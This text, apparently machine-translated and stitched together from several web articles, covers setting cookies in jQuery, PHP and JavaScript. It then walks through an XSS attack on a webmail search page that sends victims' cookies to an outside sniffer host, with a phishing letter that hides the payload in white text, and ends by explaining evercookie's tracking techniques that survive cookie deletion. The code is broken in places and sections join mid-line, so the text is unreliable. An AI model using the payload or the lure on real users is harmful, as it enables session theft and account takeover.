Cookies - installation. Methods for stealing cookies Js setting cookies
It's probably worth starting with what cookies are and what they are needed for. A cookie is a piece of data that can be stored on the user’s side and used later to implement their ideas.
Let's imagine that on your website you have the opportunity to choose the color scheme of the site. It is very convenient to implement this on cookies, since the theme he selects will be visible only to him.
Cookies exist in both PHP and jQuery. Therefore, we will consider each case in more detail.
Detailed instructions for working with Cookies in jQuery1. Setting Cookies
Now we can try to create our first cookie:
$.cookie("cookie_name", "cookie_value", ( expires: 3, path: "/", domain: "your_site.ru", secure: true ));
What's what here?
“cookie_name” – cookie name;
“cookie_value” – cookie value;
“expires” – the number of days the cookies will be stored (in our case – 3 days). After this time, cookies will be automatically deleted;
“path” – availability of cookies on the site (in our case “/” - available on the entire site). If you wish, you can specify only a specific page or section where cookies will be available, for example, “/audio/rock”;
“domain” – the domain on which the cookie is valid. If you have a subdomain, you can specify it in this parameter, for example, “domain: “subdomain.your_site.ru””, and in this case the cookie will only be available on the domain “subdomain.your_site.ru”;
“ secure" – a parameter indicating that the cookie should be transmitted over the secure https protocol.
Here, not all parameters are required, and in order to set cookies, this construction will be sufficient:
$.cookie("cookie_name", "cookie_value", ( expires: 3, path: "/" ));
2. Receiving a Cookie
Getting cookies is quite simple; you can do this using the code:
$.cookie("cookie_name");
This code can be assigned to a variable and used for your needs:
var content = $.cookie("cookie_name"); if(content != null) ( alert("Cookie exists!"); ) else ( alert("Cookie does not exist!"); )
Agree, this is very convenient.
3. Removing Cookies
To remove a cookie value, set it to "null":
$.cookie("cookie_name", null);
This, I think, is the end of the introduction to working with Cookies in jQuery. This knowledge is quite enough to implement your ideas.
Detailed instructions for working with Cookies in PHPUnlike the previous option for working with cookies, you don’t need to connect anything here.
1. Setting Cookies
In order to set cookies in PHP, we will use the built-in “setcookie” function:
What's what here?
“cookie_name” – cookie name;
“cookie_value” – cookie value;
“time()+3600” – cookie lifetime in seconds (in our case – 1 hour). If you set the lifetime to “0”, the cookie will be deleted as soon as the browser is closed;
“/” – the section in which cookies are available (in our case, available throughout the site). If you want to limit the section in which cookies will be available, then replace “/” with, for example, “/audio/rock”;
“your_site.ru” – the domain on which the cookie will be available;
“true” – a parameter indicating that the cookie is only available via the secure https protocol. Otherwise the value is false ;
“false” – a parameter indicating that the cookie is available to scripting languages. Otherwise – true (available only via http).
Here, too, not all parameters are required, and to create cookies you will only need the following construction:
For convenience, the cookie value can be set via a variable:
2. Receiving a Cookie
In order to receive cookies, you need to use:
$_COOKIE["cookie_name"];
To eliminate errors due to possible missing cookies, use:
As in the previous example of working with Cookies in jQuery, cookies can be assigned to a variable:
3. Removing Cookies
Removing cookies in PHP is just as easy as in jQuery. All you have to do is set the cookie to an empty value and a negative time (time that has already passed):
Setcookie("cookie_name", "", time() - 3600);
Time in in this example equal to an hour ago, which is quite enough to delete cookies.
I would like to note that in some cases, using cookies is much more rational than using a database to implement the necessary functionality.
Last update: 11/1/2015
One of the possibilities for saving data in javascript is the use of cookies. To work with cookies, the document object uses the cookie property.
To set cookies, just assign the document.cookie property a string with cookies:
document.cookie = "login=tom32;";
In this case, a cookie is set called "login" and has the value "tom32". And in most browsers we can view it, find out all the information about it, and then we can use it in the application:
A cookie string takes up to six different parameters: cookie name, value, expiration date, path, domain, and secure. Only two parameters were used above: the cookie name and the value. That is, in the case of the line "login=tom32;" The cookie has the name login and the value tom32.
But such cookies have a very limited lifespan: if you do not explicitly set the expiration date, the cookie will be deleted when the browser is closed. This situation may be ideal for those cases where you need to delete all information after you finish working with a web application and close the browser. However, this behavior is not always appropriate.
And in this case, we need to set the expires parameter, that is, the expiration date of the cookies:
That is, the login cookie expires on Monday, August 31, 2015 at 00:00. The format of the expires parameter is very important. However, it can be generated programmatically. To do this, we can use the toUTCString() method of the Date object:
Var expire = new Date(); expire.setHours(expire.getHours() + 4); document.cookie = "login=tom32;expires=" + expire.toUTCString() + ";";
In this case, the cookie will expire for 4 hours.
If we need to install cookies for a specific path on the site, then we can use the path parameter. For example, we want to set cookies only for the path www.mysite.com/home:
In this case, for other paths on the site, for example, www.mysite.com/shop, these cookies will not be available.
If we have multiple domains on our site and we want to set cookies directly for a specific domain, then we can use the domain parameter. For example, we have a subdomain on our website blog.mysite.com:
Document.cookie = "login=tom32;expires=Mon, 31 Aug 2015 00:00:00 GMT;path=/;domain=blog.mysite.com;";
The path=/ parameter specifies that cookies will be available for all directories and paths of the blog.mysite.com subdomain.
The last parameter - secure specifies the use of SSL (SecureSockets Layer) and is suitable for sites using the https protocol. If this parameter is set to true , cookies will only be used when establishing a secure ssl connection. By default, this parameter is false.
Document.cookie = "login=tom32;expires=Mon, 31 Aug 2015 00:00:00 GMT;path=/;domain=blog.mysite.com;secure=true;";
Receiving cookiesTo easily retrieve cookies from the browser, just access the document.cookie property:
Var expire = new Date(); expire.setHours(expire.getHours() + 4); document.cookie = "city=Berlin;expires="+expire.toUTCString()+";"; document.cookie = "country=Germany;expires="+expire.toUTCString()+";"; document.cookie = "login=tom32;"; document.write(document.cookie);
Three cookies have been set here, and the browser will show us all these cookies:
The retrieved cookies do not include the expires, path, domain, and secure parameters. Additionally, the cookies themselves are separated by semicolons, so you still need to do some conversion to get their name and value:
Var cookies = document.cookie.split(";"); for(var i=0; i
Also, instead of an “alert”, we need a script that will transfer cookies to our sniffer. We will write this script in a separate file and load it into our search. Created a test.js file with the required code and uploaded it to the hosting. The script code is like this:
Img=new Image();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
function F() (
location="http://www.solife.ru";
}
setTimeout(F, 5000);
What I would like to clarify here. Let's put ourselves in the shoes of the attacker. We need the user to click on the link. How can I force him to do this? You can promise mountains of gold and to receive them you need to follow our link to the site. But I don't think it will work. People don’t fall for this anymore (I myself constantly delete such letters without even reading them). Therefore, we will play on human pity, since it still exists in nature. We ask you to vote on the site for saving endangered animals. First, we will take the cookies, and then we will redirect the user to the voting site. The timeout for redirection was set to 5 seconds, otherwise the cookies simply did not have time to be transferred to the sniffer, and the user was immediately redirected to a site about animals. Instead of an “alert” I used the following script:
When I was done with the scripts, I started writing the letter. I came up with something like this: 
It turned out quite cynically, but I tried to bring the conditions as close as possible to reality. At the end of the letter there is a line with a script, this is so that our letter will be found when we do the search. So that the line does not raise unnecessary questions, I painted it white. I also put a space in the word “http” so that the string would not be recognized and converted into a link. Otherwise, despite the fact that the script line is written in white font, the link would be highlighted in blue by the recipient, and we don’t need this. Smart search will still find and recognize this string, despite the spaces.
E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E
I used URL encoding for the script so that nothing was filtered out. I also added the “q_folder=0” parameter for search, so that the search occurs in the “Inbox” folder.
The letter is ready, we send it. I used my second mailbox on the same service as the recipient. Let's see what came to the other box.
Our script text is not visible because it blends into the background. Let's click on the link and see what happens. The user is moved to the search results for emails based on the parameter we specified. Our letter that we sent is visible in the search results. At this time, our script has already worked and sent the user’s cookies to the sniffer. After 5 seconds (the time depends on the script settings), the user is redirected to the voting site.
I check my sniff.txt file:
Since my goal is not to steal other people’s boxes or gain access to them, I’ll end the story here. But theoretically, you can replace your cookies with someone else’s and gain access to someone else’s mailbox. In general, if an attacker is interested in a target, he will find a use for the information received.
I would like to thank Sergei Belov (
Cookies are a technology that allows a website to “remember” a user,
save his settings and not ask him for his login and password every time. Can
think that if you delete cookies in your browser, the site will not recognize you. But this one
Confidence is deceptive.
You can worry about your anonymity as much as you like, use a proxy
and VPN, forge HTTP request headers that reveal the system being used,
browser version, time zone and a lot of other information, but the website doesn’t care
There will still be ways to recognize the fact that you have already been there. In many
in cases this is not particularly critical, but not in a situation where at some
service you need to introduce yourself as another user or simply save
anonymity. It’s easy to imagine how the anti-fraud system of some kind of conventional
financial organization, if it determines that transactions were carried out from one computer
authorization under the accounts of completely different people. And isn't it nice?
realize that someone on the Internet can track your movements? Hardly. But
first things first.
Cookies have been used for centuries to identify users.
Cookies (from English "cookies") are a small piece of text information,
which the server sends to the browser. When a user accesses the server
(types its address in the browser line), the server can read the information,
contained in cookies, and based on its analysis, perform any actions.
For example, in the case of authorized access to something via the web in cookies
login and password are saved during the session, which allows the user not to
enter them again when prompted for each password-protected document. So
This way the website can "remember" the user. Technically it looks like
in the following way. When requesting a page, the browser sends a short
HTTP request text.
For example, to access the page www.example.org/index.html the browser
sends the following request to the www.example.org server:
GET /index.html HTTP/1.1
Host: www.example.org
The server responds by sending the requested page along with the text,
containing the HTTP response. This may instruct the browser to save cookies:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
If there is a Set-cookie line, the browser remembers the line name=value (name =
value) and sends it back to the server with each subsequent request:
GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: name=value
Accept: */*
Everything is very simple. If the server received cookies from the client and it has them in
database, he can definitely process them. So, if it were cookies with
the user will not have some information about authorization at the time of visiting
you will be asked for login and password. According to the standard, cookies have a certain lifespan
(even though it can be very large), after which they die. And any
the user can easily delete saved cookies by using
the corresponding option, which is available in any browser. This fact is very
upsets the owners of many resources who do not want to lose touch with
visitor. It is important for them to track him, to understand that “this person was with us
yesterday, and the day before yesterday, etc." This is especially true for various analyzers
traffic, systems for maintaining statistics, banner networks, etc. This is where
the fun begins, because developers use all sorts of
tricks that many users are not even aware of. They're on the move
various tricks.
The thing is that in addition to the usual HTTP “goodies”, which everyone has long been interested in
got used to it, now alternative storages are actively used, where the browser
can write data on the client side. The first thing to mention is
storage of what you love and hate at the same time Flash (for those users who
which it is installed). Data is stored in so-called LSO (Local Shared
Objects) - files similar in format to cookies that are saved locally on
user's computer. The approach is in many ways similar to conventional "goodies" (in this
case, a small amount is also stored on the user’s computer.
text data), but has some advantages:
- Flash cookies are common to all browsers on a computer (unlike
from the classic cookie, which is tied to the browser). Settings, information
about the session, like, say, some identifier for tracking the user,
are not tied to any specific browser, but become common for
everyone. - Flash cookies allow you to store much more data (as
usually 100 KB), which increases the number user settings,
available for saving.
In practice, LSO becomes a very simple and accessible tracking technology
user. Think about it: if I suggested you remove all the “goodies” in
system, would you remember about Flash cookies? Probably not. Now try to take
any viewer, for example, free
FlashCookiesView and see how many interesting things are recorded in
Flash repositories. A list of sites that really don’t want to
lose your trace, even if you clear your browser cache (along with the goodies).
But if advanced users and even more or less good users have heard about LSO
developers, then the existence of other data storage techniques, sometimes very
sophisticated (but effective), many do not even suspect. At least take new ones
repositories that appeared in
(Session Storage,
Local Storage, Global Storage, Database Storage via SQLite), about which you can
read in the article "". A Polish specialist was seriously confused by this problem
on safety Samy Kamkar. As a result, a special
Evercookie JavaScript library, which is specifically designed to
create the most durable cookies in the browser. Someone may ask: "Why
is this necessary?" Very simple: in order to uniquely identify
page visitor if he comes again. Such difficult-to-kill cookies are often
are called Tracking cookies and are even detected by some antiviruses as
threat to privacy. Evercookie can reduce all attempts to remain anonymous to
zero.
The secret is that evercookie uses everything available to the browser at once
storage: regular HTTP cookies, LSO, HTML5 containers. In addition, it comes into play
several cunning tricks that, with no less success, allow you to leave
computer the desired mark. Among them: generation of special PNG images,
using history browser, storing data using ETag tag, container
userData in Internet Explorer- it turns out that there are a lot of options.
You can see how effectively this works on the website.
developer -
http://samy.pl/evercookie. If you click on the "Click to create an
evercookie", cookies with a random number will be created in the browser. Try it
remove cookies wherever possible. I bet now you
I thought: “Where else can I delete cookies, except in the browser settings?”
Are you sure you deleted everything? Reload the page to be sure, you can even do it again
open browser. Now feel free to click on the “Click to rediscover cookies” button.
WTF? This did not prevent the site from taking data from somewhere - in the page fields
the number that was saved in cookies was displayed. But did we rub them? How
did it work? Let's try to understand some techniques.
An extremely interesting technique used in Evercookie is the approach
storing data in cached PNG images. When evercookie sets
cookies, it accesses the evercookie_png.php script with a special HTTP “bun”,
different from that used to store standard information about
sessions. These special cookies are read by a PHP script that creates
A PNG image in which all RGB (color) values are set according to
with information about the session. Ultimately the PNG file is sent to the client's browser
with the note: “the file must be cached for 20 years.”
Having received this data, evercookie deletes the previously created special
HTTP cookies, then makes the same request to the same PHP script, but not
providing information about the user. He sees that the data he is interested in
no, and it cannot generate a PNG. Instead, the browser returns
fake HTTP response "304 Not Modified" which causes it to pull the file from
local cache. The image from the cache is inserted into the page using the tag
HTML5 Canvas. Once this happens, evercookie reads every pixel
Canvas content, extracting the RGB values and thus restoring
the original cookie data that was stored in the image. Voila, that's it
works.
Another technique uses browser history directly. Once the browser
installs the bun, evercookie encodes the data using the Base64 algorithm,
which need to be preserved. Let's assume that this data is a string,
the resulting "bcde" after conversion to Base64. Library sequentially
accesses the following URLs in the background:
google.com/evercookie/cache/b
google.com/evercookie/cache/bc
google.com/evercookie/cache/bcd
google.com/evercookie/cache/bcde
google.com/evercookie/cache/bcde-
So these URLs are saved in history. Next comes a special
technique - CSS History Knocker, which, using a JS script and CSS, allows
check whether the user visited the specified resource or not (more details here -
samy.pl/csshack). For
evercookie bun checks run through all possible Base64 characters on
google.com/evercookie/cache, starting with the character "a" and moving on, but only
for one character. Once the script sees the URL that was accessed, it
starts searching for the next character. It turns out to be a kind of brute force. In practice
this selection is carried out extremely quickly, because there are no requests to
server are not executed. Search in history is carried out locally as much as possible
short term. The library knows it has reached the end of the line when the URL is
end with the symbol "-". We decode Base64 and get our data. How
name browser developers who allow this?
What happens if the user rubs his cookies? An important feature of the library itself
evercookie is that the user will have to try hard to
delete cookies left in different places - now there are 10 of them. If in at least one
If the cookie data remains in place, it will automatically be restored in all other
places. For example, if the user not only deletes his standard cookies, but
and clear LSO data, clean up HTML5 storages, which is already unlikely, anyway
The cookies created using the cached PNG and web history will remain. At
the next time you visit a site with evercookie, the library will not only be able to find
hidden bun, but will also restore them in all other places that
supports client browser. An interesting point is related to the transfer
"goodies" between browsers. If the user receives cookies in one browser,
that is, there is a high probability that they will be reproduced in others. The only thing
a necessary condition for this is saving the data in a Local Shared Object cookie.
The Evercookie library is completely open, so you can freely
use it and customize it to suit your needs. The server is not presented with any
serious requirements. All you need is access to a JS script in which
contains the evercookie code. To use Flash cookies (Local Shared Object),
there must be a file evercookie.swf in the folder with the script, and for the technician to work,
based on PNG caching and the use of ETag storage, access to
PHP scripts evercookie_png.php and evercookie_etag.php. Use evercookie
You can do this on any page of the site by connecting the following script:
var ec = new evercookie();
// set cookie "id" with value "12345"
// syntax: ec.set(key, value)
ec.set("id", "12345");
// restore the cookie with the name "id"
ec.get("id", function(value)
{
alert("Cookie value is " + value)
});
There is also another way to obtain cookies, based on using more
advanced callback function. This allows you to extract cookie values from
various storages used and compare them with each other:
function getCookie(best_candidate, all_candidates)
{
alert("The retrieved cookie is: " + best_candidate + "\n" + "You
can see what each storage mechanism returned " + "by looping through the all
candidates object.");
For (var item in all_candidates) document.write("Storage
mechanism " + item + " returned: " + all_candidates + "
");
}
ec.get("id", getCookie);
The evercookie library is available to everyone. It's a little scary, especially if
You have absolutely no idea what you can do against her.
There are no problems with clearing cookies in the browser and Flash. But try
delete the data wherever evercookie has been left behind! After all, if you leave the cookies in one
place - the script will automatically restore the value in all others
storages. Essentially this library is a good mode checker
privacy, which almost all browsers now have. And that's what I tell you
I'll say: from Google Chrome, Opera, Internet Explorer and Safari are just the latest in
"Private Browsing" mode completely blocked all methods used
evercookie. That is, after closing and opening the browser, the script could not
restore the value it left. There is reason to think. Moreover, in
in the near future, the developer evercookie promised to add more to the library
several data storage techniques, including using Isolated technology
Storage in Silverlight, as well as a Java applet.
